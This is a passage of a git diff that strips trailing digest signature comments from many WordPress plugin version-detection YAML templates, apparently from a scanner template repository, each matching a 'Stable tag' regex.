4a0a0047304502201c4b76dc1e525020dda8d93ea5420d294bea0ec97515277fdc6a1d2a0f9701a7022100d27df3c913a4525c09195844475d8b33e20ca9c2ee48b7de8083066f6bf5089d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 1cd63823f7..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f13ac377fe652de4a7a9d0d61026d74850566cf1c0a8843ccc17cf4a009d7694022100920d80498d1b08f0eead2c84462c2854d7f931c9e79a28a739a82f197c6e73c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index b5754581ff..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008af708f4c270caa3c79fe4f7130854e739441c28143a3c889c6d352d3ec6b69202207ebf6dabdeb90f3414336297ab1c32041ec3af39c8861f345a5c2e60c6da8919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 6f4afa1ca5..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220740f6d39a8391754b603d6e9e1a31280274f736a57bc06a41451e11ff45e09fe02200c7125e39912257d04cf5f6f352598151a8c28492f027cc269fae373721fa426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index a20bc1f496..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053efbecf185228d00a1380734d2693f0b32999c3830bfb1233468adc2d40615c022100ebdcceb5495ed065ee4d7b308ccd8ef66a060857b93cf7b7ec631a110bb03f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 0767f59121..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a66649f7eed11289997a5fa4eb9108746ac4785014668c445ea459f7b1ca3327022069d02257ef827a94e295fc7db1848ae4cfc65a67b0408f2235b9e903ab8a087c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 4d8b580db0..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203706db45bf6533b8f1594a352cf334d33643853448a7d2da0dc933b103f13f1a022100a332f35f9ea42f5ca21c102dc89c460eb8a53b752f30c255a48397f3767a04ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index ed99a8ba87..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204731030f98f1abb3da88ce5b3fd89885dbe4d4d7dec01d6445fb3a2c9c69fcbe022100cfe7e3e21bf528d9d946dc5e0e951808e1081c20e6b2cf9c28adf278ef30fb6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index df06d4ef6c..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e44d014f9eb230df8fc4b0018f4646b440bcee265cd7f5d70f99b1bc0557f4ba022100d89ad8dbcd114d2f9f6830f53103360fc63f124901022b38be063d06e941bd35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 203b879180..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c37d19058a798051e30d485d7a246b6fa5b665c05d0e3d2db1f5ebc7f8e1674402200716353d3ce628121f6f7150957ad0b964d0dc065b00298a0007f17363d3889c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index f5ca69b9e2..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055a2ea3ed70b28b994e63ad104e474066037a3a37061e6a00a8c5e045718526102205a7c0a10f3c5a726aefbebe1385e79669a7c010c2abbe6d3246c26f70a0d6903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index b40389581e..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f64a5eb761a2fee7042f67d47f90bddcef8b7ac018150260f88fec4834457899022100f6eaa6cb10fb1bc58a1408cca9e77311b27321be0ffe89355e3177da413ebf3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 790b6bae02..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022038a021181d67c4ea1ab5fb123f3ca238c7f96438615d26ecb89eeafc9cbef1f5022100cfa0c3830e41460a7d5263a27c0f5abd4b68108d2df6de1d4951b09cc92291f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index aa2de7b74a..cd248e018b 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204c0df1fc67435a7b677690672a3ec1ff98bf64adee311004cbeb5fec51eb8f5c022100822946c90beffc1debed468be6d10abd90c995bd82a34c3f11521448c4dd8473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 9fd4cce480..0993372ced 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210095c6e13736298c0c30f33fc5879098ce0300018420616c1de2fa0397e9cca720022100d179bfaf6aab945c01b44c6fd4ace0688ff7bf81fe3d5274028e8b59793f2cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 0b729f1017..7e62a84cca 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204570ac2345b960495b2f1b90d44f0f5ae8a26a9f32f1960e9ca84d1481a2e30e02206f4893e310c2fb18ee0a1a0ddd1244d5d2f3d59b85d084ff619715236fb6a472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 65d5a683a7..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0a010d2a00a97cca1ba93fc7a556becf9ab2691673edcbae7973c6ac50e6313022058fb42b704685fac9ca4a997b8ea769509460da339338d6c02538cac8899750d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c54ce778e8..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068e031cd3e3c1a6280c7edb52d53f1b47407b6040319a528fdde0fa5504458cd022100a7c19cb462972fc4665781528b0958ff4c9bdb924211913e5bbb5585716eb13c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 1f0f5cf4b3..c7ae2d51dd 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100872cd10cced7675a70ec4bcc549de31c47c30b0ddf70732b2f8e0a2091dccdfe0220793a1f0aba9d93b926cbdf50d3d8b0bd18049f9fe9df73bbd4377b8e8f8e837f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index b85873cef4..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a52a6321f6f593d0bc777ea7424a5fe6b37857b0fbb80e4264284c422ec193002206ad580848b5cbabcb39081d66db6ed763361ed10f4d0b19ee5b0e85fee9b74e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index d5032de770..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220038ed635ed4ce8528d2af99f33e9354c079daea241a24c553374a5c871884b2d02207f47b9bd2fe144e5ef2210792bfb1c0028f7b4d802a4debeb4ee913bfa9c84ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index dd5b9c3e91..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200c17196d875509ae48100e68466451f939079417346e2b5f6f1ccd3343e4b7a8022100b2e053fbc011b4c7829d6b2f5162e605163591bdd5b81015cb3959d86221ac37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 73e2f134d2..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d292ab8ccf46cacf379de98af9066d558e66df8bd654e32016b13efc3bf30e4d022100ce8c95f38f68bb62217cdab00342a63a1a88113d022d68c182935f953382875e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index e7960a23ef..299e5e4cb6 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a046d87295615905d4fc20ba85225ab64f9166bb6551904ee70d68a0b64535b6022100bffebca4bbf3115feed1cbfea50a2706ea8ed2a687d3bf5ce4c734464e897d4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 0c114541e3..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a757b54cba5c8fafa45b67b18f9ced1ffff96e7ef88158eb37a1bee53c62939602202555b4f6dd28355a07f2148e7d7b19bb6b4f031e80e9d6e162d8beec7c1bf470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 0f5e61c1ba..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089c6872edc9f7dab567f50d59720c9f8b0e08957ee1013d875682e8ad3f2c4c302201962d0cacb8b9e2cc7c4483300db4e5ddd915506d9cc7fe274817963c2eda99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 016d7021ae..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022008f4b152dd737978caaa2a374e195a951e8d8598fc19c835958fbb73621be2d60221009558129aba39be6cc1c6749ee73e860fbd0336b8f5e793a8995b8331d7541929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 174a742f70..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d6aab23d0b3bbb9762b85c12072728087a3410d95a036fe9931b1e90bd41258022100807b528b0baf97762bf84f8dea841ae1e5bae4e5c9d351ed31a6607c02ccc3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 4d4e417ae7..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9053ddad325498ce813bf55aafa196621aa1f437e16bf650a5ed9af27edd97f022100f9e98a0955fc955bf65b74ffe4d365840985e33f63481a9afa73ae17fd909ebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index ebb9a8babf..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205bcd2da8e0648f3907a25af323c982f7e33a8eb751c4dae52233165260bfa26002204088e383035e93f1c205071c93554dbd4c7fce1663b2c672690611757010dd53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 98d80b2801..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e2817f9e7e5e99af79b592dad942f27eeb935d3865d3ace9dd6396c538d5d1f02201d5962f04369ca502554fcf73c4bca9a8f07c7fda6e7e85a534a929c09c420c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index b7679cbf1d..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e5cc940d339c7c5ff0916c5bd874133b485bf29d6458403f8a792efe5068a75a02203588a72a0ba62ab254aff10ae92ea9903b7fceb1fe75848eb7d3b4a74046fc36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 79c4dff81a..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c120c2b10984db4f953a568119f834f8eddf56280779cbbd8cccd52ea898a535022023ba720b625f697e13bf084a0883f74ce45948c5df3645393a7861e4b24271eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 2fccb2a94b..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220301189eba5295a86e93b662c55d8ca655ef631b0a6cf84819d125a62b7db00a4022019b542252ff47211c41ed89fcf0785dcd25b498190755550251413701bcb4d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 299b502706..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1f092f5b31f48b4334f208d53270bc2409d68fc95c10238f324a20c01cf01dd022100b6f11869de0aa3faea4fd4f9b6bb44589f8763e24b575b72c03da0b50f5fe6eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 09ee145bcd..5685dd5f08 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a833d0d2c50aafdca1baaf94322a88a95290ab5c323cb567e07320397b30863102205a15f8eb4911f685d4f566e6ba0a92ae9130c52075ece4856948b5cd661fb7e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 682a9a6f27..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204fa6268e1d337b21ab1017c379cf442f9c6a8c70c0860e2055fd6b09c56534830220034792477bfb89ad945252907684ddc50943a5785073e1a20f3ef4a6e675ffd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 24f5f39fee..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a6991392344ebb568189311820a6d939aa5dccc1c01bfad2ed2a73882420f214022100c3b4dd95df1ab67dc202ba3db1b2cb3d0f1ef86dcced9b4188e77c1b17fff688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index d58b0cf182..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004c4aa54e6a029a8f4bd7fd18611415ac7db251e5f0d738daec05ae2c68719b102204b44de1a8eeb4f78d0fd370fb9f455492531b292221bb0747781332ccd63e1f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 5b0db74ca1..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8597cd06058ced797cbfae266fec7f5af4d2ba79cb3369430ce5555649ca7840221008e94085bd2e867cf8b85a3e55d96532514414d5c461778733808c725ec37bf4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 379f8ac815..effba09471 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009030f22d90c8b7dc7545dad5abf9bf00100aff03bb2564a0cb6c43afbccdcea1022100933753e68c39a7974a03b042517e0c5cd4ca05dac0a1836f53d3036b74609ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 2fb086361f..37153b7ae5 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba9d677c1f37ddabc97908485eab3601670f4d818c7cf0be14d0bc25dc5cedb3022100ca4736314b227c08b819cd4fa7c487154e114a80f78a986d9eb3d8958a5b189b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index d71e1d3473..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bac50bd50dce4b570d41fb09010add50f74aab45bf9e855b0c0684e60ed4895d022100f6c923ee68821caa39d446d1d8e3c1467e288bcfd472124c3f6ea3a1d5252018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index defbdb3bca..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c930fff81dd6f66f94128dff37a08f1ad7508344509b24db5f007e0eeac856a202204bb2adc7e0610a43c1bcfcfef3c9eafbe6425c5a98199c1678dd1ad2332f52b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 94c3cb41db..3462f5ea6b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c1cf156fa881517a9ba7f568dc1e66c5f3938b9247222ba730c8ed9b838543202210097cd4eaa46041f3441408065ed34d26ba6d9bd531e3cea3b7b40b12ced64a56e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index b76912a2b6..5c9ae8bc4f 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dfe39420b5b0b1aff02159a0f636134fe01e2a08489dbe8abd92572b8953aad3022100c838200c313e0df22a3c6be5c829a16aa4ac0daa039e15adc7e13db49aed1385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index c6ba727428..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0b499015a10e937390ff142aaa7e836288ab413129b4d377acdd6b7e9e40f3902203d8b7d333f6d50af4113a48bce727a311338f018029b9b18dc9571f87b8bd55a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index fd0417cdc6..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022033347325ae08e172f54dcec577111f25e9e7c2d8cd120f4711384a48d7c588ea02204e76cf42f702b5dea0011e6aded5e52e0a1aafc8f4101f4264b830fbac346024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 5a9233b57c..b9f70ba555 100644 --- 